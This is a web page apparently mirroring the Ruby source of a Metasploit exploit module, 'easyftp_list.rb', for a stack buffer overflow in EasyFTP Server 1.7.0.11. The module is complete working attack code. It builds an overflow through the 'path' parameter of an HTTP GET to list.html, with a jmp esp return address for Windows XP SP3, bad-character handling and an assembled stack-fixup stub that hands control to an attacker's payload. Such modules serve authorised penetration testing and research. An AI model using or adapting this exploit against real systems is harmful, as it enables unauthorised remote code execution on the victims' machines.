Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }910include Msf::Exploit::Remote::HttpClient1112def initialize(info = {})13super(update_info(info,14'Name' => 'EasyFTP Server list.html path Stack Buffer Overflow',15'Description' => %q{16This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.1117and earlier. EasyFTP fails to check input size when parsing the 'path' parameter18supplied to an HTTP GET request, which leads to a stack based buffer overflow.19EasyFTP allows anonymous access by default; valid credentials are typically20unnecessary to exploit this vulnerability.2122After version 1.7.0.12, this package was renamed "UplusFtp".2324Due to limited space, as well as difficulties using an egghunter, the use of25staged, ORD, and/or shell payloads is recommended.26},27'Author' =>28[29'ThE g0bL!N', # Original exploit [see References]30'jduck' # Metasploit re-implementation31],32'References' =>33[34[ 'OSVDB', '66614'],35[ 'EDB', '11500' ]36],37'DefaultOptions' =>38{39'EXITFUNC' => 'thread'40},41'Privileged' => true,42'Payload' =>43{44'Space' => 256,45'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",46'Compat' =>47{48'ConnectionType' => '+ws2ord',49},50},51'Platform' => 'win',52'Targets' =>53[54[ 'Windows XP SP3 - Easy FTP Server Universal',55# NOTE: It's not possible to use addresses within the56# binary due to the nul byte.57{58'Ret' => 0x7cc5d507 # jmp esp in shell32.dll59#'Ret' => 0xdeadbeef60}61]62],63'DefaultTarget' => 0,64'DisclosureDate' => '2010-02-18'65))6667register_options(68[69Opt::RPORT(8080),70OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),71OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])72])73end7475def check76info = http_fingerprint # check method77if info and (info =~ /Easy\-Web Server\//)78return Exploit::CheckCode::Detected79end80Exploit::CheckCode::Safe81end828384def exploit85if (payload.encoded.length > payload_space)86fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")87end8889# Fix up ESP, jmp to the beginning of the buffer90stub_asm = %q{91mov edi, esp92add esp, 0xfffffc0493add edi, 0xfffffee894jmp edi95}96stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string9798# Build the path up99path = ''100path << payload.encoded101path << rand_text(268 - path.length)102# NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.103path << [target.ret].pack('V')104path << rand_text(280 - path.length)105path << stub106path << rand_text(332 - path.length)107108uri = "/list.html?path="109uri << path110111print_status("Trying target #{target.name}...")112res = send_request_raw({ 'uri' => uri }, 5)113114if (res)115print_error("The server unexpectedly responded, this is not good.")116print_status(res.to_s)117end118119handler120end121end122123124